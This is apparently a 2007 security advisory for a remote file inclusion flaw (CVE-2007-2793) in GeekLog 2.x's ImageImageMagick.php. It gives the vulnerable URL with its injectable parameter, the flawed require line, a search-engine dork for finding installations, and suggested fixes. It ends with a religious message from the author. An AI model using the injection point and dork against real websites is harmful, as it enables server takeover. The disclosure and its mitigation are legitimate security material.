GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion

Related Vulnerabilities: CVE-2007-2793  
Publish Date: 17 May 2007
Author: diesl0w
                --------------------------------[ 05/18/2007 ]---------------------------------

GeekLog 2.* (ImageImageMagick.php) RFI Vuln

-----------------------------------[ ASCII ]-----------------------------------

     ##                             ###        # ###                           
      ##    #                        ###     /  /###                           
      ##   ###                        ##    /  /  ###                          
      ##    #                         ##   /  ##   ###  ##                     
      ##                              ##  /  ##    #### ##                     
  ### ##  ###       /##       /###    ## ##       ## ##  ##    ###    ####     
 ######### ###     / ###     / #### / ## ##      ##  ##   ##    ###     ###  / 
##   ####   ##    /   ###   ##  ###/  ## ##      ##  ##   ##     ###     ###/  
##    ##    ##   ##    ### ####       ## ##     ##   ##   ##      ##      ##   
##    ##    ##   ########    ###      ## ##    ##    ##   ##      ##      ##   
##    ##    ##   #######       ###    ##  ##  ##     ##   ##      ##      ##   
##    ##    ##   ##              ###  ##   ## #      /    ##      ##      ##   
##    /#    ##   ####    /  /###  ##  ##    ###     /     ##      /#      /    
 ####/      ### / ######/  / #### /   ### /  ######/       ######/ ######/     
  ###        ##/   #####      ###/     ##/     ###          #####   #####      
                                                        -dsd863 [at]                         
---------------------------------[ Contacts ]---------------------------------

				diesl0w @ UnderNET
		#hackphreak #oldskewl #ubergeeks #linuxhq

----------------------------------[ Credit ]----------------------------------

rgod <rgod [at]> for his original BaseView.php RFI find

---------------------------------[ Download ]---------------------------------

---------------------------------[ Vuln Code ]--------------------------------

[geeklog path]/system/ImageImageMagick.php?glConf[path_system]=

-----------------------------------[ Issue ]----------------------------------

-Line 3 of ImageImageMagick.php-

require $glConf['path_system'] . 'BaseImage.php';

-----------------------------------[ Google ]----------------------------------

"Powered By Geeklog"

----------------------------------[ Solution ]---------------------------------
Change php.ini and set allow_url_fopen to Off
(Not tested but disabling URL-Access will fix the issue)


Insert the following code before line 3:

Add the following code:

if (strpos ($_SERVER['PHP_SELF'], 'ImageImageMagick.php') !== false){ die('Cant access file by itself.'); }

----------------------------[ Word from my sponsor ]---------------------------

Non-Christians: We were born sinners in need of a fix. Without Jesus as a we are going to hell. point blank
Christians: Keep passing the faith. Crucify yourself daily. When you fall, get back up.

Romans 3:23
"for all have sinned and fall short of the glory of God"

Romans 6:23
"For the wages of sin is death, but the gift of God is eternal life through Jesus Christ our Lord."

Romans 10:9
"That if you confess with your mouth, "Jesus is Lord," and believe in your heart that God raised him from the dead, you will be saved."

# [2007-05-17]